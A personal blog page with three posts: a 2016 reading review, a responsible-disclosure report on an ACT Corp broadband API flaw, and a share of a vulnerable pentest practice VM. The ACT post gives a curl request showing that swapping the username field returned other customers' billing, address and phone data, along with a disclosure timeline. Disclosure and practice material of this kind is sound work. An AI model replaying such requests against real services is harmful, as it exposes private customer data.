Abhay Rana aka Nemo

Book Review (2016)

I tweeted this a while back about my reading progress in 2016, and thought I’d do a post about what I read.

Continuing with the review tradition from last year, here are the top 3 books that I read in 2016:

Other books that I enjoyed were “Bands of Mourning”, the 3rd book in Mistborn Era 2, and the Powder Mage Trilogy which I found hard to put down.

I decided to aim for 36 books in 2016 (as well as 2017 now), and crossed that nicely. I picked 36 because it corresponds to 3 books a month or 1 book every 10 days, which makes for a goal that is easily tracked. I count everything that goodreads might count as a book (which is both good and bad), but I stick to it. Far more important for me would be the page count, which I charted at the end of the year and I read ~830 pages a month, which I’m pretty happy with.

I’m hoping to read more technical books in 2017, and have made some progress on that front with re-reading SICP.

If you are interested in the script that generated the graph, you can find it on github.

Vulnerability Report: ACT Corp

ACT, for those who don’t know is one of India’s most popular broadband providers.

This is a very brief and concise summary.

  • ACT has a mobile application
  • That allows you to login and check your plan details, data usage etc
  • I’ve been wanting to build a command line application that lets me check the balance easily
  • I tried scripting their website, but it was too much javascript.
  • The mobile app uses an API to do the same
  • The API happens to have really bad auth
  • Got fixed almost 3 months after reporting this.

Request

curl https://myfibernet.actcorp.in/api/user/plandetails -H "Content-Type: application/json" -H "Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469" -H "Apiversion: 1.0" -H "Appversion: 32" -H "Devicetype: 1" -H "Deviceid: 68590327e3e0ca81" -H "Mobilenumber: 9999999999" -H "Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216" --data '{"username":"11111111"}'

The API responds back with the following:

{
  "code": 200,
  "status": true,
  "message": "Success",
  "data": {
    "plan_details": {
      "agreement_info": {
        "agreement_no": "XXXXXXXXXX",
        "promotion_code": "",
        "package_code": "ACTESS01M",
        "package_name": "",
        "agreement_startdate": "DD/MM/YYYY",
        "expiry_date": "",
        "status": "",
        "entity_code": "[]",
        "subscription_period": "[]",
        "payterm": "[]",
        "billingcycle_code": "[]",
        "contract_type": "ISP",
        "outlets": "1",
        "service_points": "",
        "package_tenure": int,
        "due_date": ""
      },
      "product_info": {
        "product_code": "",
        "product_desc": ""
      }
    },
    "plan_usage_info": {
      "service_id": "ACTESS01M",
      "service_name": "ACTESS01M",
      "outbyteslimit": 322122547200,
      "outbytesremaining": 153400581140,
      "outbytesused": 168721966060
    },
    "bill_info": {
      "accountno": "111111112233",
      "subscribername": "NAME",
      "phonenumber": "PHONENUMBER",
      "address": {
        "line1": "YUP",
        "line2": "THESE TWO LINES WERE FILLED",
        "line3": "",
        "district": "AND THIS",
        "city": "BANGALORE",
        "state": "KARNATAKA",
        "country": "India"
      },
      "billno": "10000001111",
      "billdate": "DD/MM/2016",
      "account_period": "01/MM/2016-30/MM/2016",
      "previous_due": "",
      "current_invoice_amt": "1234",
      "total_due": "0",
      "bill_due_date": "15 Nov 2016"
    }
  }
}

Some of these are empty fields, and some values that I didn’t understand I’ve replaced with [].

The fun part is that the request is actually a POST and contains the following data:

{"username":"11111111"}

I happen to have friends who also use ACT. I asked around for usernames, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.

Almost everyone, because for certain cases, I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. Don’t know what that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR).

If you are interested I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you login, and then cache the credentials to let you check the balance easily.

I’ve reported this to ACT as soon as I found it. Will disclose after I’ve given them some time!

Update: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).

Timeline

Date Details
29 Nov 2016 Vulnerability Identified
29 Nov 2016 Email sent to ACT, no response
6 Dec 2016 Email sent with partial customer details to explain scope of the issue, no response
8 Dec 2016 Reminder sent, no response
20 Jan 2017 Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. No response
23 Jan 2017 Accidentally an investor in ACT saw my tweet and responded over twitter. Send a writeup, along with the suggestion to take down the application
24 Jan 2017 ACT reports issue is fixed. I test and report back as fixed the next day
26 Mar 2017 Report published

However, the huge timeline involved here pretty much guarantees that if you are an ACT customer, your data is out there in the public.

CCTC Challenge VM

This is specifically about the contest held in 2011, 6 years ago. I’ve written about my experience during the contest on this blog.

More specifically, Round 2 of the contest was a pentesting scenario where we were only provided with a VM image and asked to test it and report any vulnerabilities that we found.

I recently found the VirtualBox images, and thought I’d share them as a easy intro to web security.

Instructions

  1. Get the VMWare image from https://atlantis.captnemo.in/cctc/
  2. Hack.
  3. Credentials are student:student (username:password)
  4. Open /cctc in your browser.

Rules

  1. Only application and its serving components can be tested for vulnerabilities. The serving components include
    • Webserver
    • Operating System
    • Any other services/files in the guest machine and guest operating system
  2. Any vulnerability identified in any component outside the above mentioned ones, will not be used for evaluation
  3. All participants should necessarily submit all the exploit codes/custom scripts written to identify the vulnerabilities in the system.
  4. The deadline for the original challenge was 2 weeks, but you’re free to take as much time as you want. Feel free to publish a list of vulnerabilities you find.

The attached spreadsheet provides format of the report, challenges in scope, and the details to be filled out for each vulnerability identified.

The tasks to be performed are mentioned in the report. Each task consists of the following sections:

  1. Vulnerability/Vulnerabilities - You need to write the description of the vulnerability
  2. Root Cause(s) - What is the root cause of the vulnerability?
  3. Approach adopted (Steps with screenshots) – Write the steps followed to exploit the vulnerability along with screenshot of the final screen and/or intermediate steps.
  4. Remediation with sample code snippet – Write the remediation steps to address this vulnerability. Also, write the sample code if applicable.

Also attached is a step by step installation guide for application set-up.

Few points to be considered:

  • Challenges can be attempted and completed in any order.
  • Only the application and its serving components can be tested for vulnerabilities. All other components like VMware, if tested for security issues, would lead to disqualification.
  • I will not be responsible for the discovery/notification of any zero day vulnerability in any software. If any zero-day vulnerability is identified, it is the responsibility of the concerned participant to notify the vulnerability to the respective vendor as per vendor’s policy.

If you are really interested, you can find a copy of the report we submitted at /reports/cctc.

Thanks to Harshil and Shobhit for working alongside on this.